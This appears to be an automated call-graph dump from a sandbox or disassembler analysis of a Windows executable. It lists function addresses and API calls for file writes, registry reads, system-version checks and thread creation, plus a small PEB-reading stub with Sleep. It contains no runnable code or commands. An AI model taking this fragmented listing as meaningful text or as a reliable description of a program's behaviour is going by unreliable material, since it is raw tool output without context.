82d9b6 105686->105719 105693 82da38 105687->105693 105694 82da1c 105687->105694 105690 828af4 __set_osfhnd 59 API calls 105688->105690 105689 82c5f6 __crtGetStringTypeA_stat 6 API calls 105691 82e1d6 105689->105691 105692 82d9c6 105690->105692 105691->105671 105695 828b28 __set_osfhnd 59 API calls 105692->105695 105696 82da51 105693->105696 105699 8318c1 __lseeki64_nolock 61 API calls 105693->105699 105697 828af4 __set_osfhnd 59 API calls 105694->105697 105698 82d9cd 105695->105698 105700 835c6b __write_nolock 59 API calls 105696->105700 105701 82da21 105697->105701 105703 828db6 _fprintf 9 API calls 105698->105703 105699->105696 105704 82da5f 105700->105704 105702 828b28 __set_osfhnd 59 API calls 105701->105702 105705 82da28 105702->105705 105703->105719 105706 82ddb8 105704->105706 105712 8299ac __setmbcp 59 API calls 105704->105712 105707 828db6 _fprintf 9 API calls 105705->105707 105708 82ddd6 105706->105708 105709 82e14b WriteFile 105706->105709 105707->105719 105710 82defa 105708->105710 105717 82ddec 105708->105717 105711 82ddab GetLastError 105709->105711 105721 82dd78 105709->105721 105722 82dfef 105710->105722 105724 82df05 105710->105724 105711->105721 105714 82da8b GetConsoleMode 105712->105714 105713 82e184 105713->105719 105720 828b28 __set_osfhnd 59 API calls 105713->105720 105714->105706 105715 82daca 105714->105715 105715->105706 105716 82dada GetConsoleCP 105715->105716 105716->105713 105746 82db09 105716->105746 105717->105713 105718 82de5b WriteFile 105717->105718 105718->105711 105723 82de98 105718->105723 105719->105689 105725 82e1b2 105720->105725 105721->105713 105721->105719 105726 82ded8 105721->105726 105722->105713 105727 82e064 WideCharToMultiByte 105722->105727 105723->105717 105728 82debc 105723->105728 105724->105713 105729 82df6a WriteFile 105724->105729 105730 828af4 __set_osfhnd 59 API calls 105725->105730 105731 82dee3 105726->105731 105732 82e17b 105726->105732 105727->105711 105742 82e0ab 105727->105742 105728->105721 105729->105711 105734 82dfb9 105729->105734 105730->105719 105735 828b28 __set_osfhnd 59 API calls 105731->105735 105733 828b07 __dosmaperr 59 API calls 105732->105733 105733->105719 105734->105721 105734->105724 105734->105728 105736 82dee8 105735->105736 105738 828af4 __set_osfhnd 59 API calls 105736->105738 105737 82e0b3 WriteFile 105740 82e106 GetLastError 105737->105740 105737->105742 105738->105719 105739 8235f5 __write_nolock 59 API calls 105739->105746 105740->105742 105741 8362ba 61 API calls __write_nolock 105741->105746 105742->105721 105742->105722 105742->105728 105742->105737 105743 837a5e WriteConsoleW CreateFileW __putwch_nolock 105747 82dc5f 105743->105747 105744 82dbf2 WideCharToMultiByte 105744->105721 105745 82dc2d WriteFile 105744->105745 105745->105711 105745->105747 105746->105721 105746->105739 105746->105741 105746->105744 105746->105747 105747->105711 105747->105721 105747->105743 105747->105746 105748 82dc87 WriteFile 105747->105748 105748->105711 105748->105747 105749->105654 105750->105673 105751->105664 105752->105672 105753->105671 105754->105673 105755->105664 105756->105665 105757->105673 105781 82d4c3 105758->105781 105760 830b41 105794 82d43d 60 API calls __set_osfhnd 105760->105794 105761 830aeb 105761->105760 105762 830b1f 105761->105762 105765 82d4c3 __lseek_nolock 59 API calls 105761->105765 105762->105760 105766 82d4c3 __lseek_nolock 59 API calls 105762->105766 105764 830b49 105767 830b6b 105764->105767 105795 828b07 59 API calls 2 library calls 105764->105795 105768 830b16 105765->105768 105769 830b2b CloseHandle 105766->105769 105767->105644 105771 82d4c3 __lseek_nolock 59 API calls 105768->105771 105769->105760 105772 830b37 GetLastError 105769->105772 105771->105762 105772->105760 105773->105626 105774->105634 105775->105632 105776->105644 105777->105634 105778->105632 105779->105638 105780->105634 105782 82d4e3 105781->105782 105783 82d4ce 105781->105783 105785 828af4 __set_osfhnd 59 API calls 105782->105785 105789 82d508 105782->105789 105784 828af4 __set_osfhnd 59 API calls 105783->105784 105786 82d4d3 105784->105786 105787 82d512 105785->105787 105788 828b28 __set_osfhnd 59 API calls 105786->105788 105790 828b28 __set_osfhnd 59 API calls 105787->105790 105792 82d4db 105788->105792 105789->105761 105791 82d51a 105790->105791 105793 828db6 _fprintf 9 API calls 105791->105793 105792->105761 105793->105792 105794->105764 105795->105767 105858 831940 105796->105858 105799 804799 105864 807d8c 105799->105864 105800 80477c 105801 807bcc 60 API calls 105800->105801 105803 804788 105801->105803 105860 807726 105803->105860 105806 820791 105807 82079e __ftell_nolock 105806->105807 105808 82079f GetLongPathNameW 105807->105808 105809 807bcc 60 API calls 105808->105809 105810 8072bd 105809->105810 105811 80700b 105810->105811 105812 807667 60 API calls 105811->105812 105813 80701d 105812->105813 105814 804750 61 API calls 105813->105814 105815 807028 105814->105815 105816 807033 105815->105816 105820 83e885 105815->105820 105817 803f74 60 API calls 105816->105817 105819 80703f 105817->105819 105868 8034c2 105819->105868 105822 83e89f 105820->105822 105874 807908 62 API calls 105820->105874 105823 807052 Mailbox 105823->104709 105825 804ddd 137 API calls 105824->105825 105826 80688f 105825->105826 105827 83e031 105826->105827 105828 804ddd 137 API calls 105826->105828 105829 86955b 123 API calls 105827->105829 105830 8068a3 105828->105830 105831 83e046 105829->105831 105830->105827 105832 8068ab 105830->105832 105833 83e067 105831->105833 105834 83e04a 105831->105834 105837 83e052 105832->105837 105838 8068b7 105832->105838 105836 820db6 Mailbox 60 API calls 105833->105836 105835 804e4a 85 API calls 105834->105835 105835->105837 105847 83e0ac Mailbox 105836->105847 105968 8642f8 91 API calls _wprintf 105837->105968 105875 806a8c 105838->105875 105841 83e060 105841->105833 105843 83e260 105844 822d55 _free 59 API calls 105843->105844 105845 83e268 105844->105845 105846 804e4a 85 API calls 105845->105846 105852 83e271 105846->105852 105847->105843 105847->105852 105855 807de1 60 API calls 105847->105855 105969 85f73d 60 API calls 2 library calls 105847->105969 105970 85f65e 62 API calls 2 library calls 105847->105970 105971 86737f 60 API calls Mailbox 105847->105971 105972 80750f 60 API calls 2 library calls 105847->105972 105973 80735d 60 API calls Mailbox 105847->105973 105851 822d55 _free 59 API calls 105851->105852 105852->105851 105854 804e4a 85 API calls 105852->105854 105974 85f7a1 90 API calls 4 library calls 105852->105974 105854->105852 105855->105847 105859 80475d GetFullPathNameW 105858->105859 105859->105799 105859->105800 105861 807734 105860->105861 105862 807d2c 60 API calls 105861->105862 105863 804794 105862->105863 105863->105806 105865 807da6 105864->105865 105866 807d99 105864->105866 105867 820db6 Mailbox 60 API calls 105865->105867 105866->105803 105867->105866 105869 8034d4 105868->105869 105873 8034f3 _memmove 105868->105873 105871 820db6 Mailbox 60 API calls 105869->105871 105870 820db6 Mailbox 60 API calls 105872 80350a 105870->105872 105871->105873 105872->105823 105873->105870 105874->105820 105876 806ab5 105875->105876 105877 83e41e 105875->105877 105980 8057a6 61 API calls Mailbox 105876->105980 106066 85f7a1 90 API calls 4 library calls 105877->106066 105880 806ad7 105981 8057f6 105880->105981 105881 83e431 106067 85f7a1 90 API calls 4 library calls 105881->106067 105884 806af4 105886 807667 60 API calls 105884->105886 105888 806b00 105886->105888 105887 83e44d 105916 806b61 105887->105916 105994 820957 61 API calls __ftell_nolock 105888->105994 105890 806b0c 105895 807667 60 API calls 105890->105895 105891 83e460 105893 805c6f CloseHandle 105891->105893 105892 806b6f 105894 807667 60 API calls 105892->105894 105896 83e46c 105893->105896 105897 806b78 105894->105897 105898 806b18 105895->105898 105899 804ddd 137 API calls 105896->105899 105900 807667 60 API calls 105897->105900 105901 804750 61 API calls 105898->105901 105905 83e488 105899->105905 105902 806b81 105900->105902 105903 806b26 105901->105903 106004 80459b 105902->106004 105995 805850 ReadFile SetFilePointerEx 105903->105995 105904 83e4b1 106068 85f7a1 90 API calls 4 library calls 105904->106068 105905->105904 105908 86955b 123 API calls 105905->105908 105913 83e4a4 105908->105913 105911 806b52 105996 805aee 105911->105996 105917 83e4cd 105913->105917 105918 83e4ac 105913->105918 105915 83e4c8 105947 806d0c Mailbox 105915->105947 105916->105891 105916->105892 105921 804e4a 85 API calls 105917->105921 105920 804e4a 85 API calls 105918->105920 105920->105904 105922 83e4d2 105921->105922 105923 820db6 Mailbox 60 API calls 105922->105923 105930 83e506 105923->105930 105928 803bbb 105928->104571 105928->104594 106069 80750f 60 API calls 2 library calls 105930->106069 105935 83e740 106075 8672df 60 API calls Mailbox 105935->106075 105939 83e762 106076 87fbce 60 API calls 2 library calls 105939->106076 105942 83e76f 105944 822d55 _free 59 API calls 105942->105944 105944->105947 105975 8057d4 105947->105975 105958 807de1 60 API calls 105963 83e54f Mailbox 105958->105963 105961 83e792 106077 85f7a1 90 API calls 4 library calls 105961->106077 105963->105935 105963->105958 105963->105961 106070 85f73d 60 API calls 2 library calls 105963->106070 106071 85f65e 62 API calls 2 library calls 105963->106071 106072 86737f 60 API calls Mailbox 105963->106072 106073 80750f 60 API calls 2 library calls 105963->106073 106074 807213 60 API calls Mailbox 105963->106074 105965 83e7ab 105966 822d55 _free 59 API calls 105965->105966 105967 83e7be 105966->105967 105967->105947 105968->105841 105969->105847 105970->105847 105971->105847 105972->105847 105973->105847 105974->105852 105976 805c6f CloseHandle 105975->105976 105977 8057dc Mailbox 105976->105977 105978 805c6f CloseHandle 105977->105978 105979 8057eb 105978->105979 105979->105928 105980->105880 105982 805c6f CloseHandle 105981->105982 105983 805802 105982->105983 106080 805c99 105983->106080 105985 805821 105986 805844 105985->105986 106088 805610 105985->106088 105986->105881 105986->105884 105988 805833 106105 80527b SetFilePointerEx SetFilePointerEx 105988->106105 105990 80583a 105990->105986 105991 83dc07 105990->105991 106106 86345a SetFilePointerEx SetFilePointerEx WriteFile 105991->106106 105993 83dc37 105993->105986 105994->105890 105995->105911 106003 805b08 105996->106003 105997 805b8f SetFilePointerEx 106119 805c4e SetFilePointerEx 105997->106119 106000 83dd28 106120 805c4e SetFilePointerEx 106000->106120 106001 805b63 106001->105916 106002 83dd42 106003->105997 106003->106000 106003->106001 106005 807667 60 API calls 106004->106005 106006 8045b1 106005->106006 106007 807667 60 API calls 106006->106007 106008 8045b9 106007->106008 106009 807667 60 API calls 106008->106009 106010 8045c1 106009->106010 106011 807667 60 API calls 106010->106011 106012 8045c9 106011->106012 106013 83d4d2 106012->106013 106014 8045fd 106012->106014 106015 808047 60 API calls 106013->106015 106016 80784b 60 API calls 106014->106016 106017 83d4db 106015->106017 106018 80460b 106016->106018 106019 807d8c 60 API calls 106017->106019 106020 807d2c 60 API calls 106018->106020 106022 804640 106019->106022 106021 804615 106020->106021 106021->106022 106023 80784b 60 API calls 106021->106023 106024 804680 106022->106024 106025 80465f 106022->106025 106037 83d4fb 106022->106037 106026 804636 106023->106026 106121 80784b 106024->106121 106031 8079f2 60 API calls 106025->106031 106030 807d2c 60 API calls 106026->106030 106028 804691 106032 8046a3 106028->106032 106035 808047 60 API calls 106028->106035 106029 83d5cb 106033 807bcc 60 API calls 106029->106033 106030->106022 106034 804669 106031->106034 106036 8046b3 106032->106036 106038 808047 60 API calls 106032->106038 106044 83d588 106033->106044 106034->106024 106041 80784b 60 API calls 106034->106041 106035->106032 106040 8046ba 106036->106040 106042 808047 60 API calls 106036->106042 106037->106029 106039 83d5b4 106037->106039 106052 83d532 106037->106052 106038->106036 106039->106029 106046 83d59f 106039->106046 106043 808047 60 API calls 106040->106043 106050 8046c1 Mailbox 106040->106050 106041->106024 106042->106040 106043->106050 106044->106024 106045 8079f2 60 API calls 106044->106045 106134 807924 60 API calls 2 library calls 106044->106134 106045->106044 106049 807bcc 60 API calls 106046->106049 106047 83d590 106048 807bcc 60 API calls 106047->106048 106048->106044 106049->106044 106052->106047 106053 83d57b 106052->106053 106054 807bcc 60 API calls 106053->106054 106054->106044 106066->105881 106067->105887 106068->105915 106069->105963 106070->105963 106071->105963 106072->105963 106073->105963 106074->105963 106075->105939 106076->105942 106077->105965 106081 805cb2 CreateFileW 106080->106081 106082 83dd58 106080->106082 106085 805cd4 106081->106085 106083 83dd5e CreateFileW 106082->106083 106082->106085 106084 83dd84 106083->106084 106083->106085 106086 805aee 2 API calls 106084->106086 106085->105985 106087 83dd8f 106086->106087 106087->106085 106089 83dba5 106088->106089 106090 80562b 106088->106090 106104 8056ba 106089->106104 106113 805cdf 106089->106113 106091 805aee 2 API calls 106090->106091 106090->106104 106092 80564d 106091->106092 106094 80522e 60 API calls 106092->106094 106095 805657 106094->106095 106095->106089 106096 805664 106095->106096 106097 820db6 Mailbox 60 API calls 106096->106097 106098 80566f 106097->106098 106099 80522e 60 API calls 106098->106099 106100 80567a 106099->106100 106107 805bc0 106100->106107 106102 8056a7 106103 805aee 2 API calls 106102->106103 106103->106104 106104->105988 106105->105990 106106->105993 106108 805c33 106107->106108 106112 805bce 106107->106112 106118 805c4e SetFilePointerEx 106108->106118 106109 805bf6 106109->106102 106111 805c06 ReadFile 106111->106109 106111->106112 106112->106109 106112->106111 106114 805aee 2 API calls 106113->106114 106115 805d00 106114->106115 106116 805aee 2 API calls 106115->106116 106117 805d14 106116->106117 106117->106104 106118->106112 106119->106001 106120->106002 106122 8078b7 106121->106122 106123 80785a 106121->106123 106124 807d2c 60 API calls 106122->106124 106123->106122 106125 807865 106123->106125 106131 807888 _memmove 106124->106131 106126 807880 106125->106126 106127 83eb09 106125->106127 106135 807f27 60 API calls Mailbox 106126->106135 106128 808029 60 API calls 106127->106128 106130 83eb13 106128->106130 106132 820db6 Mailbox 60 API calls 106130->106132 106131->106028 106133 83eb33 106132->106133 106134->106044 106135->106131 106137 806d95 106136->106137 106142 806ea9 106136->106142 106138 820db6 Mailbox 60 API calls 106137->106138 106137->106142 106140 806dbc 106138->106140 106139 820db6 Mailbox 60 API calls 106146 806e31 106139->106146 106140->106139 106142->104715 106146->106142 106149 806240 106146->106149 106174 80735d 60 API calls Mailbox 106146->106174 106175 856553 60 API calls Mailbox 106146->106175 106176 80750f 60 API calls 2 library calls 106146->106176 106147->104718 106148->104720 106150 807a16 60 API calls 106149->106150 106168 806265 106150->106168 106174->106146 106175->106146 106176->106146 106686 801055 106691 802649 106686->106691 106689 822d40 __cinit 68 API calls 106690 801064 106689->106690 106692 807667 60 API calls 106691->106692 106693 8026b7 106692->106693 106698 803582 106693->106698 106696 802754 106697 80105a 106696->106697 106701 803416 106696->106701 106697->106689 106707 8035b0 106698->106707 106702 80344e 106701->106702 106706 803428 _memmove 106701->106706 106705 820db6 Mailbox 60 API calls 106702->106705 106703 820db6 Mailbox 60 API calls 106704 80342e 106703->106704 106704->106696 106705->106706 106706->106703 106708 8035bd 106707->106708 106709 8035a1 106707->106709 106708->106709 106710 8035c4 RegOpenKeyExW 106708->106710 106709->106696 106710->106709 106711 8035de RegQueryValueExW 106710->106711 106712 803614 RegCloseKey 106711->106712 106713 8035ff 106711->106713 106712->106709 106713->106712 106714 801016 106719 804974 106714->106719 106717 822d40 __cinit 68 API calls 106718 801025 106717->106718 106720 820db6 Mailbox 60 API calls 106719->106720 106721 80497c 106720->106721 106722 80101b 106721->106722 106726 804936 106721->106726 106722->106717 106727 804951 106726->106727 106728 80493f 106726->106728 106730 8049a0 106727->106730 106729 822d40 __cinit 68 API calls 106728->106729 106729->106727 106731 807667 60 API calls 106730->106731 106732 8049b8 GetVersionExW 106731->106732 106733 807bcc 60 API calls 106732->106733 106734 8049fb 106733->106734 106735 807d2c 60 API calls 106734->106735 106744 804a28 106734->106744 106736 804a1c 106735->106736 106737 807726 60 API calls 106736->106737 106737->106744 106738 804a93 GetCurrentProcess IsWow64Process 106739 804aac 106738->106739 106741 804ac2 106739->106741 106742 804b2b GetSystemInfo 106739->106742 106740 83d864 106754 804b37 106741->106754 106743 804af8 106742->106743 106743->106722 106744->106738 106744->106740 106747 804ad4 106750 804b37 2 API calls 106747->106750 106748 804b1f GetSystemInfo 106749 804ae9 106748->106749 106749->106743 106752 804aef FreeLibrary 106749->106752 106751 804adc GetNativeSystemInfo 106750->106751 106751->106749 106752->106743 106755 804ad0 106754->106755 106756 804b40 LoadLibraryA 106754->106756 106755->106747 106755->106748 106756->106755 106757 804b51 GetProcAddress 106756->106757 106757->106755 106758 801066 106763 80f76f 106758->106763 106760 80106c 106761 822d40 __cinit 68 API calls 106760->106761 106762 801076 106761->106762 106764 80f790 106763->106764 106796 81ff03 106764->106796 106768 80f7d7 106769 807667 60 API calls 106768->106769 106770 80f7e1 106769->106770 106771 807667 60 API calls 106770->106771 106772 80f7eb 106771->106772 106773 807667 60 API calls 106772->106773 106774 80f7f5 106773->106774 106775 807667 60 API calls 106774->106775 106776 80f833 106775->106776 106777 807667 60 API calls 106776->106777 106778 80f8fe 106777->106778 106806 815f87 106778->106806 106782 80f930 106783 807667 60 API calls 106782->106783 106784 80f93a 106783->106784 106834 81fd9e 106784->106834 106786 80f981 106787 80f991 GetStdHandle 106786->106787 106788 80f9dd 106787->106788 106789 8445ab 106787->106789 106790 80f9e5 OleInitialize 106788->106790 106789->106788 106791 8445b4 106789->106791 106790->106760 106841 866b38 65 API calls Mailbox 106791->106841 106793 8445bb 106842 867207 CreateThread 106793->106842 106795 8445c7 CloseHandle 106795->106790 106843 81ffdc 106796->106843 106799 81ffdc 60 API calls 106800 81ff45 106799->106800 106801 807667 60 API calls 106800->106801 106802 81ff51 106801->106802 106803 807bcc 60 API calls 106802->106803 106804 80f796 106803->106804 106805 820162 6 API calls 106804->106805 106805->106768 106807 807667 60 API calls 106806->106807 106808 815f97 106807->106808 106809 807667 60 API calls 106808->106809 106810 815f9f 106809->106810 106850 815a9d 106810->106850 106813 815a9d 60 API calls 106814 815faf 106813->106814 106815 807667 60 API calls 106814->106815 106816 815fba 106815->106816 106817 820db6 Mailbox 60 API calls 106816->106817 106818 80f908 106817->106818 106819 8160f9 106818->106819 106820 816107 106819->106820 106821 807667 60 API calls 106820->106821 106822 816112 106821->106822 106823 807667 60 API calls 106822->106823 106824 81611d 106823->106824 106825 807667 60 API calls 106824->106825 106826 816128 106825->106826 106827 807667 60 API calls 106826->106827 106828 816133 106827->106828 106829 815a9d 60 API calls 106828->106829 106830 81613e 106829->106830 106831 820db6 Mailbox 60 API calls 106830->106831 106832 816145 RegisterClipboardFormatW 106831->106832 106832->106782 106835 85576f 106834->106835 106836 81fdae 106834->106836 106853 869ae7 61 API calls 106835->106853 106837 820db6 Mailbox 60 API calls 106836->106837 106839 81fdb6 106837->106839 106839->106786 106840 85577a 106841->106793 106842->106795 106854 8671ed 66 API calls 106842->106854 106844 807667 60 API calls 106843->106844 106845 81ffe7 106844->106845 106846 807667 60 API calls 106845->106846 106847 81ffef 106846->106847 106848 807667 60 API calls 106847->106848 106849 81ff3b 106848->106849 106849->106799 106851 807667 60 API calls 106850->106851 106852 815aa5 106851->106852 106852->106813 106853->106840 106855 801078 106860 80708b 106855->106860 106857 80108c 106858 822d40 __cinit 68 API calls 106857->106858 106859 801096 106858->106859 106861 80709b __ftell_nolock 106860->106861 106862 807667 60 API calls 106861->106862 106863 807151 106862->106863 106864 804706 62 API calls 106863->106864 106865 80715a 106864->106865 106891 82050b 106865->106891 106868 807cab 60 API calls 106869 807173 106868->106869 106870 803f74 60 API calls 106869->106870 106871 807182 106870->106871 106872 807667 60 API calls 106871->106872 106873 80718b 106872->106873 106874 807d8c 60 API calls 106873->106874 106875 807194 RegOpenKeyExW 106874->106875 106876 83e8b1 RegQueryValueExW 106875->106876 106880 8071b6 Mailbox 106875->106880 106877 83e943 RegCloseKey 106876->106877 106878 83e8ce 106876->106878 106877->106880 106890 83e955 _wcscat Mailbox __NMSG_WRITE 106877->106890 106879 820db6 Mailbox 60 API calls 106878->106879 106881 83e8e7 106879->106881 106880->106857 106882 80522e 60 API calls 106881->106882 106883 83e8f2 RegQueryValueExW 106882->106883 106885 83e90f 106883->106885 106887 83e929 106883->106887 106884 8079f2 60 API calls 106884->106890 106886 807bcc 60 API calls 106885->106886 106886->106887 106887->106877 106888 807de1 60 API calls 106888->106890 106889 803f74 60 API calls 106889->106890 106890->106880 106890->106884 106890->106888 106890->106889 106892 831940 __ftell_nolock 106891->106892 106893 820518 GetFullPathNameW 106892->106893 106894 82053a 106893->106894 106895 807bcc 60 API calls 106894->106895 106896 807165 106895->106896 106896->106868 106897 80552a 106904 805ab8 106897->106904 106903 80555a Mailbox 106905 820db6 Mailbox 60 API calls 106904->106905 106906 805acb 106905->106906 106907 820db6 Mailbox 60 API calls 106906->106907 106908 80553c 106907->106908 106909 8054d2 106908->106909 106916 8058cf 106909->106916 106911 805514 106911->106903 106915 808061 62 API calls Mailbox 106911->106915 106912 805bc0 2 API calls 106913 8054e3 106912->106913 106913->106911 106913->106912 106923 805a7a 106913->106923 106915->106903 106917 8058e0 106916->106917 106918 83dc3c 106916->106918 106917->106913 106932 855ecd 60 API calls Mailbox 106918->106932 106920 83dc46 106921 820db6 Mailbox 60 API calls 106920->106921 106922 83dc52 106921->106922 106924 83dcee 106923->106924 106925 805a8e 106923->106925 106938 855ecd 60 API calls Mailbox 106924->106938 106933 8059b9 106925->106933 106928 805a9a 106928->106913 106929 83dcf9 106930 820db6 Mailbox 60 API calls 106929->106930 106931 83dd0e _memmove 106930->106931 106932->106920 106934 8059d1 106933->106934 106937 8059ca _memmove 106933->106937 106935 83dc7e 106934->106935 106936 820db6 Mailbox 60 API calls 106934->106936 106936->106937 106937->106928 106938->106929 106939 a3f4c8 106953 a3d0d8 106939->106953 106941 a3f5c7 106956 a3f3b8 106941->106956 106959 a40608 GetPEB 106953->106959 106955 a3d763 106955->106941 106957 a3f3c1 Sleep 106956->106957 106958 a3f3cf 106957->106958 106960 a40632 106959->106960 106960->106955 106961 80e5ab 106964 80d100 106961->106964 106963 80e5b9 106965 80d11d 106964->106965 106993 80d37d 106964->106993 106966 8426e0 106965->106966 106967 842691 106965->106967 106996 80d144 106965->106996 107011 87a3e6 342 API calls __cinit 106966->107011 106969 842694 106967->106969 106978 8426af 106967->106978 106971 8426a0 106969->106971 106969->106996 107009 87a9fa 342 API calls 106971->107009 106972 822d40 __cinit 68 API calls 106972->106996 106975 80d434 107004 808a52 69 API calls 106975->107004 106976 8428b5 106976->106976 106977 80d54b 106977->106963 106978->106993 107010 87aea2 342 API calls 3 library calls 106978->107010 106980 808740 69 API calls 106980->106996 106982 8427fc 107015 87a751 90 API calls 106982->107015 106983 80d443 106983->106963 106986 8084c0 70 API calls 106986->106996 106993->106977 107016 869e4a 90 API calls 4 library calls 106993->107016 106994 809ea0 342 API calls 106994->106996 106995 808047 60 API calls 106995->106996 106996->106972 106996->106975 106996->106977 106996->106980 106996->106982 106996->106986 106996->106993 106996->106994 106996->106995 106998 809dda 106996->106998 107003 808542 69 API calls 106996->107003 107005 80843a 69 API calls 106996->107005 107006 80cf7c 342 API calls 106996->107006 107007 80cf00 90 API calls 106996->107007 107008 80cd7d 342 API calls 106996->107008 107012 808a52 69 API calls 106996->107012 107013 809d3c 61 API calls Mailbox 106996->107013 107014 85678d 61 API calls 106996->107014 106999 820db6 Mailbox 60 API calls 106998->106999 107000 809de7 106999->107000 107001 809df6 107000->107001 107002 807de1 60 API calls 107000->107002 107001->106996 107002->107001 107003->106996 107004->106983 107005->106996 107006->106996 107007->106996 107008->106996 107009->106977 107010->106993 107011->106996 107012->106996 107013->106996 107014->106996 107015->106993 107016->106976 107017 83fdfc 107050 80ab30 Mailbox _memmove 107017->107050 107019 85617e Mailbox 60 API calls 107044 80a057 107019->107044 107022 80b525 107206 869e4a 90 API calls 4 library calls 107022->107206 107024 840055 107205 869e4a 90 API calls 4 library calls 107024->107205 107026 80b475 107035 808047 60 API calls 107026->107035 107029 820db6 60 API calls Mailbox 107041 809f37 Mailbox 107029->107041 107030 808047 60 API calls 107030->107041 107031 840064 107032 80b47a 107032->107024 107045 8409e5 107032->107045 107035->107044 107037 807667 60 API calls 107037->107041 107038 856e8f 60 API calls 107038->107041 107039 822d40 68 API calls __cinit 107039->107041 107040 807de1 60 API calls 107040->107050 107041->107024 107041->107026 107041->107029 107041->107030 107041->107032 107041->107037 107041->107038 107041->107039 107042 8409d6 107041->107042 107041->107044 107046 80a55a 107041->107046 107198 80c8c0 342 API calls 2 library calls 107041->107198 107199 80b900 61 API calls Mailbox 107041->107199 107210 869e4a 90 API calls 4 library calls 107042->107210 107211 869e4a 90 API calls 4 library calls 107045->107211 107209 869e4a 90 API calls 4 library calls 107046->107209 107047 87bc6b 342 API calls 107047->107050 107049 80b2b6 107203 80f6a3 342 API calls 107049->107203 107050->107022 107050->107040 107050->107041 107050->107044 107050->107047 107050->107049 107052 809ea0 342 API calls 107050->107052 107053 84086a 107050->107053 107055 840878 107050->107055 107057 84085c 107050->107057 107058 80b21c 107050->107058 107060 820db6 60 API calls Mailbox 107050->107060 107062 856e8f 60 API calls 107050->107062 107067 87df23 107050->107067 107070 811fc3 107050->107070 107110 86d07b 107050->107110 107157 87c2e0 107050->107157 107189 867956 107050->107189 107195 85617e 107050->107195 107200 809c90 60 API calls Mailbox 107050->107200 107204 87c193 86 API calls 2 library calls 107050->107204 107052->107050 107207 809c90 60 API calls Mailbox 107053->107207 107208 869e4a 90 API calls 4 library calls 107055->107208 107057->107019 107057->107044 107201 809d3c 61 API calls Mailbox 107058->107201 107060->107050 107061 80b22d 107202 809d3c 61 API calls Mailbox 107061->107202 107062->107050 107068 87cadd 131 API calls 107067->107068 107069 87df33 107068->107069 107069->107050 107071 809a98 60 API calls 107070->107071 107072 811fdb 107071->107072 107074 820db6 Mailbox 60 API calls 107072->107074 107076 846585 107072->107076 107075 811ff4 107074->107075 107078 812004 107075->107078 107227 8057a6 61 API calls Mailbox 107075->107227 107077 812029 107076->107077 107231 86f574 60 API calls 107076->107231 107081 809b3c 60 API calls 107077->107081 107086 812036 107077->107086 107080 809837 85 API calls 107078->107080 107082 812012 107080->107082 107083 8465cd 107081->107083 107084 8057f6 68 API calls 107082->107084 107085 8465d5 107083->107085 107083->107086 107087 812021 107084->107087 107089 809b3c 60 API calls 107085->107089 107088 805cdf 2 API calls 107086->107088 107087->107076 107087->107077 107230 8058ba CloseHandle 107087->107230 107091 81203d 107088->107091 107089->107091 107092 8465e7 107091->107092 107093 812057 107091->107093 107095 820db6 Mailbox 60 API calls 107092->107095 107094 807667 60 API calls 107093->107094 107096 81205f 107094->107096 107097 8465ed 107095->107097 107212 805572 107096->107212 107099 846601 107097->107099 107232 805850 ReadFile SetFilePointerEx 107097->107232 107104 846605 _memmove 107099->107104 107233 8676c4 60 API calls 2 library calls 107099->107233 107101 81206e 107101->107104 107228 809a3c 60 API calls Mailbox 107101->107228 107105 812082 Mailbox 107106 8120bc 107105->107106 107107 805c6f CloseHandle 107105->107107 107106->107050 107108 8120b0 107107->107108 107108->107106 107229 8058ba CloseHandle 107108->107229 107111 86d09a 107110->107111 107112 86d0a5 107110->107112 107113 809b3c 60 API calls 107111->107113 107116 807667 60 API calls 107112->107116 107155 86d17f Mailbox 107112->107155 107113->107112 107114 820db6 Mailbox 60 API calls 107115 86d1c8 107114->107115 107118 86d1d4 107115->107118 107238 8057a6 61 API calls Mailbox 107115->107238 107117 86d0c9 107116->107117 107119 807667 60 API calls 107117->107119 107121 809837 85 API calls 107118->107121 107122 86d0d2 107119->107122 107123 86d1ec 107121->107123 107124 809837 85 API calls 107122->107124 107125 8057f6 68 API calls 107123->107125 107126 86d0de 107124->107126 107127 86d1fb 107125->107127 107128 80459b 60 API calls 107126->107128 107129 86d233 107127->107129 107130 86d1ff GetLastError 107127->107130 107131 86d0f3 107128->107131 107134 86d295 107129->107134 107135 86d25e 107129->107135 107132 86d218 107130->107132 107133 807b2e 60 API calls 107131->107133 107138 86d188 Mailbox 107132->107138 107239 8058ba CloseHandle 107132->107239 107136 86d126 107133->107136 107140 820db6 Mailbox 60 API calls 107134->107140 107137 820db6 Mailbox 60 API calls 107135->107137 107139 86d178 107136->107139 107144 863c37 3 API calls 107136->107144 107141 86d263 107137->107141 107138->107050 107143 809b3c 60 API calls 107139->107143 107145 86d29a 107140->107145 107146 86d274 107141->107146 107148 807667 60 API calls 107141->107148 107143->107155 107147 86d136 107144->107147 107145->107138 107150 807667 60 API calls 107145->107150 107240 87fbce 60 API calls 2 library calls 107146->107240 107147->107139 107149 86d13a 107147->107149 107148->107146 107152 807de1 60 API calls 107149->107152 107150->107138 107153 86d147 107152->107153 107237 863a2a 64 API calls Mailbox 107153->107237 107155->107114 107155->107138 107156 86d150 Mailbox 107156->107139 107158 807667 60 API calls 107157->107158 107159 87c2f4 107158->107159 107160 807667 60 API calls 107159->107160 107161 87c2fc 107160->107161 107162 807667 60 API calls 107161->107162 107163 87c304 107162->107163 107164 809837 85 API calls 107163->107164 107176 87c312 107164->107176 107165 87c528 Mailbox 107165->107050 107166 807bcc 60 API calls 107166->107176 107167 807924 60 API calls 107167->107176 107169 87c4e2 107172 807cab 60 API calls 107169->107172 107170 87c4fd 107173 807cab 60 API calls 107170->107173 107171 808047 60 API calls 107171->107176 107174 87c4ef 107172->107174 107175 87c50c 107173->107175 107178 807b2e 60 API calls 107174->107178 107179 807b2e 60 API calls 107175->107179 107176->107165 107176->107166 107176->107167 107176->107169 107176->107170 107176->107171 107177 807e4f 60 API calls 107176->107177 107180 807e4f 60 API calls 107176->107180 107182 87c4fb 107176->107182 107186 807cab 60 API calls 107176->107186 107187 809837 85 API calls 107176->107187 107188 807b2e 60 API calls 107176->107188 107181 87c3a9 CharUpperBuffW 107177->107181 107178->107182 107179->107182 107183 87c469 CharUpperBuffW 107180->107183 107241 80843a 69 API calls 107181->107241 107182->107165 107243 809a3c 60 API calls Mailbox 107182->107243 107242 80c5a7 70 API calls 2 library calls 107183->107242 107186->107176 107187->107176 107188->107176 107190 867962 107189->107190 107191 820db6 Mailbox 60 API calls 107190->107191 107192 867970 107191->107192 107193 86797e 107192->107193 107194 807667 60 API calls 107192->107194 107193->107050 107194->107193 107244 8560c0 107195->107244 107197 85618c 107197->107050 